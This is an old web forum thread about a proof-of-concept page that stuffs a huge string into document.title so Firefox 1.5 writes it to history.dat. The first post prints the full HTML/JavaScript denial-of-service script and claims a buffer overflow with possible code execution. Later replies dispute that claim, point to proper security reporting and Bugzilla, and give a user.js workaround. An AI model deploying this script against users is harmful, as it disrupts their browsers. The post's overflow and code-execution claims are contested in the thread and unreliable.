[markedmannerf]

This may Ive already been reported but Im going to post it here.

<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

[name already taken]

You'll want to file a bug at https://bugzilla.mozilla.org/

[hellene]

I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.

[scratch]

this is NOT the proper way to report a security bug.

please see http://www.mozilla.org/projects/securit ... olicy.html

[mesostinky]

Is this your source?

http://packetstormsecurity.org/0512-exp ... erflow.txt

Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.

[Elfguy]

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

[VIPerous]

It's on digg now http://digg.com/security/Kill_Firefox_1 ... te_exploit which means everyone knows.

And here is one of the comments from Digg:

"And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER."

How do YOU see where the stack is involved?

There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat.

The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins).

It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No."

[Elfguy]

It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!

[Unarmed]

One-line fix in user.js:

Code: Select all

user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");

Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.

[Elfguy]

https://bugzilla.mozilla.org/show_bug.cgi?id=319004

[hellene]

Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.

[Spaceman-Spiff]

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858

[Peng]

Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858

They're two different problems.

[Vallejo]

Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.

[diilbert]

One-line fix in user.js:

Code: Select all

user_pref("capability.policy.default.HTMLDocument.title.set", "noAccess");

Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em.

I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction?

I am using XP SP2. Thanks.